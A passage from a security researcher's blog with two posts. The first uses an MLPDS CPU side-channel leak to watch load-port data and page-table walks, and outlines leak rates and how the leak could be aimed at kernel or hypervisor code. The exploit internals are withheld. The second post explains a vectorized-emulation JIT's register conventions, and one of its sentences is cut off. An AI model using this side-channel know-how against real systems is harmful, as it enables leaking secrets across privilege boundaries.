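<p>As a quick sanity check (my own sketch, not part of the original PoC), whether an access splits a cache line is just a question of whether its bytes cross a 64-byte boundary:</p>

```rust
// Sketch: does a `size`-byte access at `addr` straddle a 64-byte cache line?
fn splits_cache_line(addr: u64, size: u64) -> bool {
    (addr & 0x3f) + size > 64
}

fn main() {
    // An 8-byte load at an address with the bottom 6 bits set always splits
    assert!(splits_cache_line(0xffff_8000_1234_003f, 8));
    // A naturally aligned 8-byte load never does
    assert!(!splits_cache_line(0xffff_8000_1234_0038, 8));
    println!("ok");
}
```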
<p>This bug is largely an issue when hyper-threading is enabled as this allows a
sibling thread to be executing protected/privileged code while another thread
uses this attack to observe recently loaded data.</p>
<p>I found this bug when working on early PoCs of L1TF when we were assessing the
impact it had. In my L1TF PoC (which was using random virtual addresses each
attempt) I ended up disabling the page table modification. This ultimately is
the root requirement for L1TF to work, and to my surprise, I was still seeing
a signal. I initially thought it was some sort of CPU bug leaking registers as
the value I was leaking was never actually read in my code. It turns out what I
ended up observing was the hypervisor itself context switching my VM. What I
was leaking was the contents of the registers as they were loaded during the
context switch!</p>
<p>Unfortunately MLPDS has a <em>really</em> complex PoC…</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
</code></pre></div></div>
<p>After this instruction executes and it faults or aborts, the contents of
<code class="language-plaintext highlighter-rouge">rax</code> during a small speculative window will potentially contain stale data
from load ports. That’s all it takes!</p>
<p>From this point it’s just some trickery to get the 64-bit value leaked during
the speculative window!</p>
<hr />
<h1 id="its-all-too-random">It’s all too random</h1>
<p>Okay, so MLPDS allows us to sample a “random” value which was recently loaded
on the load ports. This is a great start as we could probably run this attack
over and over and see what data is observed on a sample piece of code. Using
hyper-threading for this attack will be ideal because we can have one thread
running some sample code in an infinite loop, while the other code observes the
values seen on the load port.</p>
<h1 id="an-mlpds-exploit">An MLPDS exploit</h1>
<p>Since there isn’t yet a public exploit for MLPDS, especially with the data
rates we’re going to use here, I’m just going to go over the high-level details
and not show how it’s implemented under the hood.</p>
<p>For this MLPDS exploit I use a couple different primitives. One is a pretty
basic exploit which simply attempts to leak the raw contents of the value which
was leaked. This value that we leak is always 64 bits, but we can choose to only
leak a few of the bytes from it (or even bit-level granularity). There’s a
performance increase for the fewer bytes that we leak as it decreases the
number of cache lines we need to prime-and-probe each attempt.</p>
<p>There’s also another exploit type that I use that allows me to look for a
specific value in memory, which turns the leak from a multi-byte leak to just a
boolean “was value/wasn’t value”. This is the highest performance version due
to how little information has to be leaked past the speculative window.</p>
<p>All of these leaks will leak a specific value from a single speculative run.
For example if we were to leak a 64-bit value, the 64-bit value will be from
one MLPDS exploit and one speculative window. Getting an entire 64-bit value
out during a single speculative window is a surprisingly hard problem, and I’m
going to keep that as my own special sauce for a while. Compared to many public
CPU leak exploits, this attack does not loop multiple times using masks to
slowly reveal a value, it will get revealed from a single attempt. This is
critical to us as otherwise we wouldn’t be able to observe values which are
loaded once.</p>
<p>Here’s some of the leak rate numbers for the current version of MLPDS that I’m
using:</p>
<table>
<thead>
<tr>
<th>Leak type</th>
<th>Leaks/second</th>
</tr>
</thead>
<tbody>
<tr>
<td>Known 64-bit value</td>
<td>5,979,278</td>
</tr>
<tr>
<td>8-bit any value</td>
<td>228,479</td>
</tr>
<tr>
<td>16-bit any value</td>
<td>116,023</td>
</tr>
<tr>
<td>24-bit any value</td>
<td>25,175</td>
</tr>
<tr>
<td>32-bit any value</td>
<td>13,726</td>
</tr>
<tr>
<td>40-bit any value</td>
<td>12,713</td>
</tr>
<tr>
<td>48-bit any value</td>
<td>10,297</td>
</tr>
<tr>
<td>56-bit any value</td>
<td>9,521</td>
</tr>
<tr>
<td>64-bit any value</td>
<td>8,234</td>
</tr>
</tbody>
</table>
<p>It’s important to note that the known 64-bit value search is much faster than
all of the others. We’ll make some good use of this later!</p>
<h4 id="test">Test</h4>
<p>Let’s try out a simple MLPDS attack on a small piece of code which loops
forever fetching 2 values from memory.</p>
<div class="language-nasm highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x12345678f00dfeed</span>
<span class="nf">mov</span> <span class="p">[</span><span class="mh">0x1000</span><span class="p">],</span> <span class="nb">rax</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="mh">0x1337133713371337</span>
<span class="nf">mov</span> <span class="p">[</span><span class="mh">0x1008</span><span class="p">],</span> <span class="nb">rax</span>
<span class="err">2:</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="mh">0x1000</span><span class="p">]</span>
<span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="mh">0x1008</span><span class="p">]</span>
<span class="nf">jmp</span> <span class="mi">2</span><span class="nv">b</span>
</code></pre></div></div>
<p>This code should in theory just cause two loads: one of the value
<code class="language-plaintext highlighter-rouge">0x12345678f00dfeed</code> and another of the value <code class="language-plaintext highlighter-rouge">0x1337133713371337</code>. Let’s spin
this up on a hardware thread and have the sibling thread perform MLPDS in a
loop! We’ll use our 64-bit any value MLPDS attack and just histogram all of the
different values we observe get leaked.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sampling done:
0x12345678f00dfeed : 100532
0x1337133713371337 : 99217
</code></pre></div></div>
<p>Voila! Here we see the two different secret values on the attacking thread, at
a pretty much comparable frequency.</p>
<p>Cool… so now we have a technique that will allow us to see the contents of
all loads on load ports, but randomly sampled only. Let’s take a look at the
weird behaviors during accessed bit updates by clearing the accessed bit on the
final level page tables every loop in the same code above.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sampling done:
0x0000000000000008 : 559
0x0000000000000009 : 2316
0x000000000000000a : 142
0x000000000000000e : 251
0x0000000000000010 : 825
0x0000000000000100 : 19
0x0000000000000200 : 3
0x0000000000010006 : 438
0x000000002cc8c000 : 3796
0x000000002cc8c027 : 225
0x000000002cc8d000 : 112
0x000000002cc8d027 : 57
0x000000002cc8e000 : 1
0x000000002cc8e027 : 35
0x00000000ffff8bc2 : 302
0x00002da0ea6a5b78 : 1456
0x00002da0ea6a5ba0 : 2034
0x0000700dfeed0000 : 246
0x0000700dfeed0008 : 5081
0x0000930000000000 : 4097
0x00209b0000000000 : 15101
0x1337133713371337 : 2028
0xfc91ee000008b7a6 : 677
0xffff8bc2fc91b7c4 : 2658
0xffff8bc2fc9209ed : 4565
0xffff8bc2fc934019 : 2
</code></pre></div></div>
<p>Whoa! That’s a lot more values than we saw before. They include not just the two
values we’re loading in a loop, but many other values. Strangely the <code class="language-plaintext highlighter-rouge">0x1234...</code>
value is missing as well. Interesting. Well, since we know these are accessed
bit updates, perhaps some of these are entries from the page table walk. Let’s
look at the actual page table entries for the page we’re hitting.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CR3 0x630000
PML4E 0x2cc8e007
PDPE 0x2cc8d007
PDE 0x2cc8c007
PTE 0x13370003
</code></pre></div></div>
<p>Oh! How cool is that!? In the loads we’re leaking we see the raw page table
entries with various versions of the accessed and dirty bits set! Here are the
loads which stand out to me:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Leaked values:
0x000000002cc8c000 : 3796
0x000000002cc8c027 : 225
0x000000002cc8d000 : 112
0x000000002cc8d027 : 57
0x000000002cc8e000 : 1
0x000000002cc8e027 : 35
Actual page table entries for the page we're accessing:
CR3 0x630000
PML4E 0x2cc8e007
PDPE 0x2cc8d007
PDE 0x2cc8c007
PTE 0x13370003
</code></pre></div></div>
<p>The entries are being observed as <code class="language-plaintext highlighter-rouge">0x...27</code> as the <code class="language-plaintext highlighter-rouge">0x20</code> bit is the accessed
bit for page table entries.</p>
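<p>Decoding these flag bits is mechanical; here is a hedged sketch (my own helper, not from the original tooling) that names the architectural low bits of an entry:</p>

```rust
// Sketch: decode the low architectural flag bits of an x86-64 page table
// entry, handy for interpreting leaked values like 0x2cc8c027 above
fn pte_flags(entry: u64) -> Vec<&'static str> {
    [(1u64 << 0, "present"), (1 << 1, "writable"), (1 << 2, "user"),
     (1 << 5, "accessed"), (1 << 6, "dirty")]
        .iter()
        .filter(|&&(bit, _)| entry & bit != 0)
        .map(|&(_, name)| name)
        .collect()
}

fn main() {
    // 0x27 = present | writable | user | accessed
    println!("{:?}", pte_flags(0x2cc8c027));
    // 0x03 = present | writable (accessed bit not yet set)
    println!("{:?}", pte_flags(0x13370003));
}
```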
<p>Other notable entries are <code class="language-plaintext highlighter-rouge">0x0000930000000000</code> and <code class="language-plaintext highlighter-rouge">0x00209b0000000000</code> which
look like the GDT entries for the code and data segments. <code class="language-plaintext highlighter-rouge">0x0000700dfeed0000</code>
and <code class="language-plaintext highlighter-rouge">0x0000700dfeed0008</code> which are the 2 virtual addresses I’m accessing the
un-accessed memory from. Who knows about the rest of the values? Probably some
stack addresses in there…</p>
<p>So clearly as we expected, the processor is dispatching uops which are
performing a page table walk. Sadly we have no idea what the order of this walk
is; maybe we can find a creative technique for sequencing these loads…</p>
<hr />
<h1 id="sequencing-the-loads">Sequencing the Loads</h1>
<p>Sequencing the loads that we are leaking with MLPDS is going to be critical to
getting meaningful information. Without knowing the ordering of the loads we
simply know their contents. Which is a pretty awesome amount of information,
I’m definitely not complaining… but come on, it’s not perfect!</p>
<p>But perhaps we can limit the timing of our attack to a specific window, and
infer ordering based on that. If we can find some trigger point where we can
synchronize time between the attacker thread and the thread with secrets, we
could change the delay between this synchronization and the leak attempt. By
sweeping this delay we should hopefully get to see a cycle-by-cycle view of
observed values.</p>
<h4 id="a-trigger-point">A trigger point</h4>
<p>We can perform an MLPDS attack on a delay, however we need a reference point to
delay from. I’ll steal the oscilloscope terminology of a trigger, or a
reference location to synchronize with. Similar to an oscilloscope, this trigger
will synchronize us on the time domain each time we attempt.</p>
<p>The easiest trigger we can use works only in an environment where we control
both the leaking and secret threads, but in our case we have that control.</p>
<p>What we can do is simply have semaphores at each stage of the leak. We’ll have
2 hardware threads running with the following logic:</p>
<ol>
<li>(Thread A running) (Thread B paused)</li>
<li>(Thread A) Prepare to do a CPU attack, request thread B execute code</li>
<li>(Thread A) Delay for a fixed amount of cycles with a spin loop</li>
<li>(Thread B) Execute sample code</li>
<li>(Thread A) At some “random” point during Thread B executing sample code,
perform MLPDS attack to leak a value</li>
<li>(Thread B) Complete sample code execution, wait for thread A to request
another execution</li>
<li>(Thread A) Log the observed value and the number of cycles in the delay loop</li>
  <li>goto step 1 and do this many times until significant data is collected</li>
</ol>
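<p>The steps above can be sketched as two threads handshaking through atomics. This is my own illustration: the “leak” here is just a plain read of a shared value where the real attack would perform MLPDS, but the trigger/delay structure is the same:</p>

```rust
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::Arc;
use std::thread;

// Sketch of the trigger protocol; the MLPDS leak is replaced by a shared read
fn collect_samples(attempts: u64) -> Vec<(u64, u64)> {
    let go = Arc::new(AtomicBool::new(false));
    let done = Arc::new(AtomicBool::new(false));
    let stop = Arc::new(AtomicBool::new(false));
    let secret = Arc::new(AtomicU64::new(0));

    // Thread B: wait for a request, run the "sample code", signal completion
    let thread_b = {
        let (go, done, stop, secret) =
            (go.clone(), done.clone(), stop.clone(), secret.clone());
        thread::spawn(move || {
            while !stop.load(Ordering::SeqCst) {
                if go.swap(false, Ordering::SeqCst) {
                    secret.store(0x1337, Ordering::SeqCst); // stand-in sample code
                    done.store(true, Ordering::SeqCst);
                }
            }
        })
    };

    // Thread A: trigger B, spin for a variable delay, then "leak" a value
    let mut log = Vec::new();
    for delay in 0..attempts {
        go.store(true, Ordering::SeqCst);
        for _ in 0..delay { std::hint::spin_loop(); } // variable-length delay loop
        let observed = secret.load(Ordering::SeqCst); // MLPDS attack goes here
        while !done.swap(false, Ordering::SeqCst) {}  // wait for B to finish
        log.push((delay, observed));
    }
    stop.store(true, Ordering::SeqCst);
    thread_b.join().unwrap();
    log
}

fn main() {
    let log = collect_samples(100);
    println!("collected {} samples", log.len());
}
```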
<h4 id="uncontrolled-target-code">Uncontrolled target code</h4>
<p>If needed a trigger could be set on a “known value” at some point during
execution if target code is not controllable. For example, if you’re attacking a
kernel, you could identify a magic value or known user pointer which gets
accessed close to the code under test. An MLPDS attack can be performed until
this magic value is seen, then a delay can start, and another attack can be
used to leak a value. This allows uncontrolled target code to be sampled in
a similar way. If the trigger “misses” it’s fine, just try again in another
loop.</p>
<h4 id="did-it-work">Did it work?</h4>
<p>So we put all of these things together, but does it actually work? Let’s try
our 2-load example, and we’ll make sure the loads depend on each other to ensure
they don’t get re-ordered by the processor.</p>
<p>Prep code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">write_volatile</span><span class="p">(</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u64</span><span class="p">,</span> <span class="mi">0x12341337cafefeed</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">write_volatile</span><span class="p">((</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u64</span><span class="p">)</span><span class="nf">.offset</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span> <span class="mi">0x1337133713371337</span><span class="p">);</span>
</code></pre></div></div>
<p>Test code:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="n">ptr</span> <span class="o">=</span> <span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">read_volatile</span><span class="p">(</span><span class="n">vaddr</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">);</span>
<span class="nn">core</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nf">read_volatile</span><span class="p">((</span><span class="n">vaddr</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="p">(</span><span class="n">ptr</span> <span class="o">&</span> <span class="mi">0x8</span><span class="p">))</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">usize</span><span class="p">);</span>
</code></pre></div></div>
<p>In this code we set up 2 dependent loads: one which reads a value, and then
another which masks the value with <code class="language-plaintext highlighter-rouge">0x8</code>, using the result as an offset for
a subsequent access. Since the values are constants, we know that the second
access will always access at offset 8, thus we expect to see a load of
<code class="language-plaintext highlighter-rouge">0x1234...</code> followed by <code class="language-plaintext highlighter-rouge">0x1337...</code>.</p>
<h4 id="graphing-the-data">Graphing the data</h4>
<p>To graph the data we have collected, we want to collect the frequencies each
value was seen for every cycle offset. We’ll plot these with an x axis in
cycles, and a y axis in frequency the value was observed at that cycle count.
Then we’ll overlay multiple graphs for the different values we’ve seen. Let’s
check it out in our simple case test code!</p>
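<p>As a sketch of the aggregation (my own illustration, not the actual plotting code), the raw (delay, value) samples just get folded into one frequency curve per value, plus the frequency-weighted mean cycle for each:</p>

```rust
use std::collections::HashMap;

// Sketch: one frequency-over-cycles curve per distinct leaked value
fn frequency_curves(samples: &[(u64, u64)]) -> HashMap<u64, HashMap<u64, u64>> {
    let mut curves: HashMap<u64, HashMap<u64, u64>> = HashMap::new();
    for &(cycles, value) in samples {
        *curves.entry(value).or_default().entry(cycles).or_insert(0) += 1;
    }
    curves
}

// Frequency-weighted mean cycle, where the vertical marker would be drawn
fn weighted_mean_cycle(curve: &HashMap<u64, u64>) -> f64 {
    let total: u64 = curve.values().sum();
    curve.iter().map(|(&c, &f)| (c * f) as f64).sum::<f64>() / total as f64
}

fn main() {
    let samples = [(100, 0x1234), (101, 0x1234), (140, 0x1337)];
    let curves = frequency_curves(&samples);
    println!("mean cycle for 0x1234: {}", weighted_mean_cycle(&curves[&0x1234]));
}
```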
<p><img src="/assets/leak_seq_example.png" alt="Sequenced leak example data" />
<em><sub>Sequenced leak example data</sub></em></p>
<p>Here we also introduce a normal distribution best-fit for each value type, and
a vertical line through the mean frequency-weighted value.</p>
<p>And look at that! We see the first access (in light blue) indicating that the
value <code class="language-plaintext highlighter-rouge">0x12341337cafefeed</code> was read, and slightly after we see (in orange) the
value <code class="language-plaintext highlighter-rouge">0x1337133713371337</code> was read! Exactly what we would have expected. How
cool is that!? There’s some other noise on here from the testing harness, but
they’re pretty easy to ignore in this case.</p>
<hr />
<h1 id="a-real-data-case">A real-data case</h1>
<p>Let’s put it all together and take a look at what a load looks like on pages
which have not yet been marked as accessed.</p>
<p><img src="/assets/loadseq_example.png" alt="Load sequence example" /></p>
<p><em><sub>Frequencies of observed values over time from load ports. Here we’re
seeing the processor internally performing a microcode-assisted page table walk
to update accessed and dirty bits. Only one load was performed by the user;
these are all “invisible” loads done behind the scenes</sub></em></p>
<p>Hmmm, this is a bit too noisy. Let’s re-collect the data but this time only
look at the page table entry values and the value contained on the page we’re
accessing.</p>
<p>Here are the page table entries for the memory we’re accessing in our example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>CR3 0x630000
PML4E 0x2cc7c007
PDPE 0x2cc7b007
PDE 0x2cc7a007
PTE 0x13370003
Data 0x12341337cafefeed
</code></pre></div></div>
<p>We’re going to reset all page table entries to their non-dirty, non-accessed
states, invalidate the TLB for the page via <code class="language-plaintext highlighter-rouge">invlpg</code>, and then read from the
memory once. This will cause all accessed bits to be updated in the page
tables! Here’s what we get…</p>
<p><img src="/assets/annotated_ucode_page_walk.png" alt="Annotated ucode page walk" />
<em><sub>Annotated ucode-assist page walk as observed with this technique</sub></em></p>
<p>Here it’s hard to say why we see the 3rd and 4th levels of the page table get
hit, as well as the page contents, prior to the accessed bit updates. Perhaps
the processor tries the access first, and when it realizes the accessed bits
are not set it goes through and sets them all. We can see fairly clearly that
after this page data is read ~300 cycles in, that it performs a page-by-page
walk through each level. Presumably this is where the processor is reading the
original values from pages, <code class="language-plaintext highlighter-rouge">or</code>ing in the accessed bit, and moving to the next
level!</p>
<hr />
<h1 id="speeding-it-up">Speeding it up</h1>
<p>So far using our 64-bit MLPDS leak we can get about 8,000 leaks per second.
This is a decent data rate, but when we’re wanting to sample data and draw
statistical significance, more is always better. For each different value we
want to log, and for each cycle count, we likely want about ~100 points of
data. So let’s assume we want to sample 10 values over a 1000-cycle range:
that’s about 1 million data points, which at ~8,000 leaks per second means
we’ll need about 2 minutes’ worth of runtime to collect this data.</p>
<p>Luckily, there’s a relatively simple technique we can use to speed up the data
rates. Instead of using the full arbitrary 64-bit leak for the whole test, we
can use the arbitrary leak early on to determine the values of interest. We
just want to use the arbitrary leak for long enough to determine the values
which we know are accessed during our test case.</p>
<p>Once we know the values we actually want to leak, we can switch to using our
known-value leak which allows for about 6 million leaks per second. Since this
can only look for one value at a time, we’ll also have to cycle through the
values in our “known value” list, but the speedup is still worth it until the
known value list gets incredibly large.</p>
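<p>The scheduling side of this is simple; here is a hedged sketch (my own illustration, the <code class="language-plaintext highlighter-rouge">KnownValueScheduler</code> name is hypothetical) of rotating the fast known-value search through the discovered values:</p>

```rust
// Sketch: once the slow arbitrary leak has discovered the values of interest,
// cycle the fast known-value search through them round-robin
struct KnownValueScheduler {
    targets: Vec<u64>,
    next: usize,
}

impl KnownValueScheduler {
    fn new(targets: Vec<u64>) -> Self {
        Self { targets, next: 0 }
    }

    // The value the next known-value leak attempt should search for
    fn next_target(&mut self) -> u64 {
        let target = self.targets[self.next];
        self.next = (self.next + 1) % self.targets.len();
        target
    }
}

fn main() {
    let mut sched = KnownValueScheduler::new(vec![0x2cc8c027, 0x1337133713371337]);
    for _ in 0..4 {
        println!("searching for {:#x}", sched.next_target());
    }
}
```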
<p>With this technique, collecting the 1 million data points for something with
5-6 values to sample only takes about a second. A speedup of two orders of
magnitude! This is the technique that I’m currently using, although I have a
fallback to arbitrary value mode if needed for some future use.</p>
<hr />
<h1 id="conclusion">Conclusion</h1>
<p>We introduced an interesting technique for monitoring Intel load port traffic
cycle-by-cycle and demonstrated that it can be used to get meaningful data to
learn how Intel micro-architecture works. While there is much more for us to
poke around in, this was a simple example to show this technique!</p>
<h1 id="future">Future</h1>
<p>There is so much more I want to do with this work. First of all, this will just
be polished in my toolbox and used for future CPU research. It’ll be a
good go-to tool for when I need a little bit more introspection. But, I’m sure
as time goes on I’ll come up with new interesting things to monitor. Getting
logging of store-port activity would be useful such that we could see the other
side of memory transactions.</p>
<p>As with anything I do, performance is always an opportunity for improvement.
Getting a higher-fidelity MLPDS exploit, potentially with higher throughput,
would always help make collecting data easier. I’ve also got some fun ideas for
filtering this data to remove “deterministic noise”. Since we’re attacking from
a sibling hyperthread I suspect we’d see some deterministic sliding and
interleaving of core usage. If I could isolate these down and remove the noise
that’d help a lot.</p>
<p>I hope you enjoyed this blog! See you next time!</p>
<hr />Miniblog: How conditional branches work in Vectorized Emulation2019-10-07T07:11:15+00:002019-10-07T07:11:15+00:00https://gamozolabs.github.io/fuzzing/2019/10/07/vectorized_emulation_condbranch<h1 id="twitter">Twitter</h1>
<p>Follow me at <a href="https://twitter.com/gamozolabs">@gamozolabs</a> on Twitter if you want notifications when new blogs come up. I also do random one-off posts for cool data that doesn’t warrant an entire blog!</p>
<p>Let me know if you like this mini-blog format! It takes a lot less time than a whole blog, but I think will still have interesting content!</p>
<hr />
<h1 id="prereqs">Prereqs</h1>
<p>You should probably read the <a href="https://gamozolabs.github.io/fuzzing/2018/10/14/vectorized_emulation.html">Introduction to Vectorized Emulation blog</a>!</p>
<p>Or perhaps watch the <a href="https://recon.cx/media-archive/2019/Session.004.Brandon_Falk.Vectorized_Emulation_Putting_it_all_together-kFn8Kr6lsNZQZ.mp4">talk I gave at RECON 2019</a></p>
<h1 id="summary">Summary</h1>
<p>I spent this weekend working on a JIT for my IL (FalkIL, or fail). I thought this would be a cool opportunity to make a mini-blog describing how I currently handle conditional branches in vectorized emulation.</p>
<p>This is one of the most complex parts of vectorized emulation, and has a lot of depth. But today we’re going to go into a simple merging example: what I call the “auto-merge”. I call it an auto-merge because it doesn’t require any static analysis of potential merging points. The instructions that get emitted simply allow for automatic re-merging of divergent VMs. It’s really simple, but pretty nifty. We have to perform this logic on every branch.</p>
<hr />
<h1 id="falkil-example">FalkIL Example</h1>
<p>Here’s an example of what FalkIL looks like:</p>
<p><img src="/assets/falkil_example_graph.png" alt="FalkIL example" /></p>
<hr />
<h1 id="jit">JIT</h1>
<p>Here’s what the JIT for the above IL example looks like:</p>
<p><img src="/assets/falkil_example_jit_graph.png" alt="FalkIL JIT example" /></p>
<p>Ooof… that exploded a bit. Let’s dive in!</p>
<hr />
<h1 id="jit-calling-convention">JIT Calling Convention</h1>
<p>Before we can go into what the JIT is doing, we have to understand the calling convention we use. It’s important to note that this calling convention is custom, and follows no standard convention.</p>
<h2 id="kmask-registers">Kmask Registers</h2>
<p>Kmask registers are the bitmasks provided to us in hardware to mask off certain operations. Since we’re always executing instructions even if some VMs have been disabled, we must always honor using kmasks.</p>
<p>Intel provides us with 8 kmask registers. <code class="language-plaintext highlighter-rouge">k0</code> through <code class="language-plaintext highlighter-rouge">k7</code>. <code class="language-plaintext highlighter-rouge">k0</code> is hardcoded in hardware to all ones (no masking). Thus, we’re not able to use this for general purpose masking.</p>
<h3 id="online-vm-mask">Online VM mask</h3>
<p>Since at any given time we might be performing operations with VMs disabled, we need to have one kmask register always dedicated to holding the mask of VMs that are actively running. Since <code class="language-plaintext highlighter-rouge">k1</code> is the first general purpose kmask we can use, that’s exactly what we pick. Any bit which is clear in <code class="language-plaintext highlighter-rouge">k1</code> (VM is disabled), must not have its state modified. Thus you’ll see <code class="language-plaintext highlighter-rouge">k1</code> is used as a merging mask for almost every single vectorized operation we do.</p>
<p>By using the <code class="language-plaintext highlighter-rouge">k1</code> mask in every instruction, we preserve the lanes of vector
<p>This mask must also be honored during scalar code that emulates complex vectorized operations (for example divs, which have no vectorized instruction).</p>
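<p>As a scalar model (my own sketch, not JIT output), merge-masking with <code class="language-plaintext highlighter-rouge">k1</code> behaves like this: lanes whose mask bit is clear are simply left alone, which is what preserves disabled VM state for free:</p>

```rust
// Sketch: scalar model of AVX-512 merge-masking with the k1 "online VM" mask.
// Lanes whose k1 bit is clear keep their old state untouched.
fn masked_add(dst: &mut [u64; 8], src: [u64; 8], k1: u8) {
    for lane in 0..8 {
        if (k1 >> lane) & 1 != 0 {
            dst[lane] = dst[lane].wrapping_add(src[lane]);
        }
    }
}

fn main() {
    let mut dst = [1u64; 8];
    masked_add(&mut dst, [10; 8], 0b0000_0101); // only VMs 0 and 2 are online
    println!("{:?}", dst); // lanes 0 and 2 updated, the rest preserved
}
```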
<h3 id="following-vm-mask">“Following” VM mask</h3>
<p>At some points during emulation we run into situations where VMs have to get disabled. For example, some VMs might take a true branch, and others might take the false (or “else”) side of a branch. In this case we need to make a decision (very quickly) about which VM to follow. To do this, we have a VM which we mark as the “following” VM. We store this “following” VM mask in <code class="language-plaintext highlighter-rouge">k7</code>. This always contains a single bit, and it’s the bit of the VM which we will always follow when we have to make divergence decisions.</p>
<p>The VM we are “following” must always be active, and thus <code class="language-plaintext highlighter-rouge">(k7 & k1) != 0</code> must always be true! This <code class="language-plaintext highlighter-rouge">k7</code> mask only has to be updated when we enter the JIT, thus the computation of which VM to “follow” may be complex as it will not be a common expense. While the JIT is executing, this <code class="language-plaintext highlighter-rouge">k7</code> mask will never have to be updated unless the VM we are following causes a fault (at which point a new VM to follow will be computed).</p>
<h3 id="kmask-register-summary">Kmask Register Summary</h3>
<p>Here’s the complete state of kmask register allocation during JIT</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>K0 - Hardcoded in hardware to all ones
K1 - Bitmask indicating "active/online" VMs
K2-K6 - Scratch kmask registers
K7 - "Following" VM mask
</code></pre></div></div>
<h2 id="zmm-registers">ZMM registers</h2>
<p>The 512-bit ZMM registers are where we store most of our active contextual data. There are only 2 special case ZMM registers which we reserve.</p>
<h3 id="following-vm-index-vector">“Following” VM index vector</h3>
<p>In the same vein as the “following” VM mask mentioned above, we also store the index for the “following” VM in all 8 64-bit lanes of <code class="language-plaintext highlighter-rouge">zmm30</code>. This is needed to make decisions about which VM to follow. At certain points we will need to see which VMs “agree with” the VM we are following, and thus we need a way to quickly broadcast out the following VM’s values to all components of a vector.</p>
<p>By holding the index (effectively the bit index of the following VM mask) in all lanes of the <code class="language-plaintext highlighter-rouge">zmm30</code> vector, we can perform a single <code class="language-plaintext highlighter-rouge">vpermq</code> instruction to broadcast the following VM’s value to all lanes in a vector.</p>
<p>Similar to the VM mask, this only needs to be computed when the JIT is entered and when faults occur. This means filling this register can be a more expensive operation, as it stays the same for the entirety of a JIT execution (until a JIT/VM exit).</p>
<h4 id="why-this-is-important">Why this is important</h4>
<p>Let’s say:</p>
<p><code class="language-plaintext highlighter-rouge">zmm31</code> contains <code class="language-plaintext highlighter-rouge">[10, 11, 12, 13, 14, 15, 16, 17]</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm30</code> contains <code class="language-plaintext highlighter-rouge">[3, 3, 3, 3, 3, 3, 3, 3]</code></p>
<p>The CPU then executes <code class="language-plaintext highlighter-rouge">vpermq zmm0, zmm30, zmm31</code></p>
<p><code class="language-plaintext highlighter-rouge">zmm0</code> now contains <code class="language-plaintext highlighter-rouge">[13, 13, 13, 13, 13, 13, 13, 13]</code>… the value of VM #3 (zero-indexed) in <code class="language-plaintext highlighter-rouge">zmm31</code> broadcast to all lanes of <code class="language-plaintext highlighter-rouge">zmm0</code></p>
<p>Effectively <code class="language-plaintext highlighter-rouge">vpermq</code> uses the indices in its second operand to select values from the third operand.</p>
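<p>A quick Python model of that broadcast (my sketch; the real <code class="language-plaintext highlighter-rouge">vpermq</code> with 64-bit lanes uses the low 3 bits of each index):</p>

```python
def vpermq(indices, values):
    """vpermq dst, indices, values: lane i of dst is values[indices[i] & 7]."""
    return [values[idx & 7] for idx in indices]

zmm31 = [10, 11, 12, 13, 14, 15, 16, 17]
zmm30 = [3] * 8                       # index of the VM we are following
print(vpermq(zmm30, zmm31))           # → [13, 13, 13, 13, 13, 13, 13, 13]
```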
<h3 id="desired-target-vector">“Desired target” vector</h3>
<p>We allocate one other ZMM register (<code class="language-plaintext highlighter-rouge">zmm31</code>) to hold the block identifiers for where each lane “wants” to execute. What this means is that when divergence occurs, <code class="language-plaintext highlighter-rouge">zmm31</code> will have the corresponding lane updated to where the VM that diverged “wanted” to go. VMs which were disabled thus can be analyzed to see where they “wanted” to go, but instead they got disabled :(</p>
<h3 id="zmm-register-summary">ZMM Register Summary</h3>
<p>Here’s the complete state of ZMM register allocation during JIT</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Zmm0-Zmm3 - Scratch registers for internal JIT use
Zmm4-Zmm29 - Used for IL register allocation
Zmm30 - Index of the VM we are following broadcast to all 8 quadwords
Zmm31 - Branch targets for each VM, indicates where all VMs want to execute
</code></pre></div></div>
<h2 id="general-purpose-registers">General purpose registers</h2>
<p>These are fairly simple. It’s a lot more complex when we talk about memory accesses and such, but we already talked about that in the <a href="https://gamozolabs.github.io/fuzzing/2018/11/19/vectorized_emulation_mmu.html">MMU blog</a>!</p>
<p>When ignoring the MMU, there are only 2 GPRs that we have a special use for…</p>
<h3 id="constant-storage-database">Constant storage database</h3>
